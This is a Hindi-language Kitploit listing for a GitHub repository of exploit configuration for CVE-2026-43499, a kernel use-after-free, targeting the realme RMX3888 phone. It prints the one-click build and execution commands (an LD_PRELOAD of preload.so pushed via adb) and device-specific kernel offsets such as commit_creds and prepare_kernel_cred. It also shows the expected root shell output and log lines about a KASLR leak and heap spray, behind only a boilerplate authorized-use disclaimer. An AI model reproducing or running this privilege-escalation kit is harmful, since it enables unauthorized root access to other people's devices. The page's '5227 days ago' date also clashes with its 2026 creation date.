Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
rmx3888-cve-2026-43499-config — realme RMX3888 (Android 16) के लिए CVE-2026-43499 एक्सप्लॉइट कॉन्फ़िगरेशन - 20 सत्यापित कर्नेल ऑफसेट | Kitploit
उपकरण/GitHubGitHub/bailan766/rmx3888-cve-2026-43499-config
एंड्रॉइड सुरक्षाभेद्यता विश्लेषणशोषणमोबाइल सुरक्षालर्निंग और शिक्षापेलोड डेवलपमेंटबाइनरी शोषण
GitHubbailan766/rmx3888-cve-2026-43499-config

rmx3888-cve-2026-43499-config

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

realme RMX3888 (Android 16) के लिए CVE-2026-43499 एक्सप्लॉइट कॉन्फ़िगरेशन - 20 सत्यापित कर्नेल ऑफसेट

रिपॉजिटरी देखें
5227 दिन पहलेअभी तक समीक्षित नहीं

realme RMX3888 के लिए CVE-2026-43499 एक्सप्लॉइट कॉन्फ़िगरेशन

डिवाइस जानकारी

  • ब्रांड/मॉडल: realme RMX3888
  • एंड्रॉइड संस्करण: 16 (SDK 36)
  • बिल्ड आईडी: BP2A.250605.015
  • कर्नेल: Linux 6.1.141-android14-11-o-gffc54a6d2287
  • SoC: Qualcomm SM8650 (Snapdragon 8 Gen 3)
  • आर्किटेक्चर: ARM64 (aarch64)

अवलोकन

इस रिपॉज़िटरी में realme RMX3888 डिवाइस को लक्षित करने वाले CVE-2026-43499 (GhostLock) एक्सप्लॉइट के लिए संपूर्ण कॉन्फ़िगरेशन फ़ाइलें शामिल हैं। सभी कर्नेल ऑफ़सेट डिवाइस के boot.img से निकाले गए हैं और सत्यापित किए गए हैं।

विशेषताएँ

✓ 20 सत्यापित कर्नेल ऑफ़सेट vmlinux से निकाले गए
✓ रीयल-टाइम लॉगिंग कर्नेल पैनिक सुरक्षा के लिए O_SYNC + fsync के साथ
✓ डिवाइस-विशिष्ट कॉन्फ़िगरेशन RMX3888 के लिए
✓ एक-क्लिक कंपाइलेशन स्क्रिप्ट NDK ऑटो-डिटेक्शन के साथ
✓ व्यापक दस्तावेज़ीकरण बिल्ड गाइड के साथ

शामिल फ़ाइलें

कॉन्फ़िगरेशन फ़ाइलें

  • target.h - डिवाइस-विशिष्ट कर्नेल ऑफ़सेट (20 सत्यापित ऑफ़सेट)
  • common.h - लॉगिंग एकीकरण के साथ बिल्ड कॉन्फ़िगरेशन
  • realtime_log.h - रीयल-टाइम लॉगिंग कार्यान्वयन

दस्तावेज़ीकरण

  • BUILD_GUIDE.md - पूर्ण कंपाइलेशन गाइड
  • report.md - विस्तृत विश्लेषण रिपोर्ट (राउंड 1)
  • round2_report.md - कॉन्फ़िगरेशन रिपोर्ट (राउंड 2)
  • ROUND2_STATUS.md - निष्पादन स्थिति सारांश
  • compile_status.json - मशीन-पठनीय बिल्ड स्थिति

स्क्रिप्ट्स

  • compile_rmx3888.sh - एक-क्लिक कंपाइलेशन स्क्रिप्ट

त्वरित आरंभ

पूर्वापेक्षाएँ

  • Android NDK r26d या उससे नया
  • Git Bash, Linux/WSL, या Termux वातावरण

कंपाइलेशन

root@kitploit:~
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh

Windows Git Bash पर, स्क्रिप्ट Android Studio और कमांड-लाइन टूल्स द्वारा उपयोग किए जाने वाले डिफ़ॉल्ट SDK पथ का स्वतः पता लगाती है: /c/Android/Sdk/ndk/*।

नोट: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL, और COPY_SPLICE_READ वर्तमान में RMX3888 टार्गेट हेडर में बिल्ड-संगत फ़ॉलबैक का उपयोग करते हैं। रनटाइम व्यवहार पर भरोसा करने से पहले उन्हें सत्यापित RMX3888 vmlinux ऑफ़सेट से बदलें।

उपयोग

root@kitploit:~
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/

# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so

# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id

# Check logs
adb shell cat /sdcard/Download/log_*.txt

मुख्य ऑफ़सेट

नीचे दिए गए मुख्य ऑफ़सेट कर्नेल 6.1.141 से निकाले गए थे। बिल्ड-संगत फ़ॉलबैक प्रविष्टियों के लिए ऊपर दिया गया नोट देखें, जिन्हें अभी भी RMX3888-विशिष्ट सत्यापन की आवश्यकता है।

root@kitploit:~
#define KIMAGE_TEXT_BASE        0xffffffc008000000ULL
#define INIT_TASK_OFF           0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF         0x0126bbe0ULL
#define COMMIT_CREDS            0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED     0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets

लॉगिंग विशेषताएँ

एकीकृत रीयल-टाइम लॉगिंग मॉड्यूल प्रदान करता है:

  • प्राथमिक लॉग पथ: /sdcard/Download/log_.txt
  • फ़ॉलबैक पथ: /data/local/tmp/log_.txt
  • कर्नेल पैनिक सुरक्षित: तत्काल डिस्क लेखन के लिए O_SYNC + fsync() का उपयोग करता है
  • टाइमस्टैम्प वाली प्रविष्टियाँ: सभी लॉग प्रविष्टियों में सटीक टाइमस्टैम्प शामिल होते हैं
  • stderr मिरर: लॉग adb logcat के लिए stderr पर भी आउटपुट होते हैं

अपेक्षित परिणाम

सफल एक्सप्लॉइटेशन

uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...

लॉग फ़ाइल आउटपुट

` === CVE-2026-43499 Exploit Log Started === Time: 2026-07-23 18:00:00 PID: 12345 UID: 2000 Log Path: /sdcard/Download/log_20260723_180000.txt

[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `

समस्या निवारण

विस्तृत समस्या निवारण निर्देशों के लिए BUILD_GUIDE.md देखें, जिनमें शामिल हैं:

  • कंपाइलेशन त्रुटियाँ
  • रनटाइम क्रैश
  • KASLR बायपास समस्याएँ
  • SELinux पॉलिसी ब्लॉक

सुरक्षा सूचना

⚠️ चेतावनी: यह कॉन्फ़िगरेशन केवल अधिकृत सुरक्षा अनुसंधान के लिए है।

  • केवल अपने स्वामित्व वाले डिवाइस पर उपयोग करें
  • बिना प्राधिकरण के संकलित बाइनरी वितरित न करें
  • जिम्मेदार डिस्क्लोज़र प्रथाओं का सम्मान करें
  • लॉग फ़ाइलों में संवेदनशील सिस्टम जानकारी हो सकती है

तकनीकी विवरण

निष्कर्षण प्रक्रिया

  1. Boot.img को Android Boot Image v4 पार्सर का उपयोग करके अनपैक किया गया
  2. vmlinux-to-elf का उपयोग करके vmlinux निकाला गया (102,871 सिंबल)
  3. 99,580 मान्य सिंबल पार्स और विश्लेषित किए गए
  4. 20 महत्वपूर्ण ऑफ़सेट क्रॉस-सत्यापित किए गए
  5. सिंबल एड्रेस संगति जाँच के माध्यम से ऑफ़सेट सत्यापन

ऑफ़सेट सत्यापन

  • कर्नेल बेस एड्रेस की पुष्टि हुई: 0xffffffc008000000
  • सभी सिंबल एड्रेस मेमोरी लेआउट के विरुद्ध सत्यापित किए गए
  • संदर्भ डिवाइस (Google Pixel tokay) के साथ क्रॉस-रेफरेंस किया गया
  • 100% निष्कर्षण सफलता दर (20/20 ऑफ़सेट)

संदर्भ

  • CVE-2026-43499: GhostLock - Ion एलोकेटर UAF भेद्यता
  • एक्सप्लॉइट स्रोत: https://github.com/NebuSec/CyberMeowfia
  • लक्षित डिवाइस: realme RMX3888 (Snapdragon 8 Gen 3)

लाइसेंस

यह कॉन्फ़िगरेशन केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।

अस्वीकरण

इस रिपॉज़िटरी में सुरक्षा अनुसंधान सामग्री शामिल है। इस कोड के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए लेखक और योगदानकर्ता जिम्मेदार नहीं हैं। अपने जोखिम पर उपयोग करें और केवल उन्हीं डिवाइसों पर जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण है।


निर्मित: 2026-07-23
कर्नेल संस्करण: 6.1.141-android14-11-o-gffc54a6d2287
ऑफ़सेट सत्यापन: 100% (20/20)
स्थिति: कंपाइलेशन के लिए तैयार

टूल डाउनलोड करें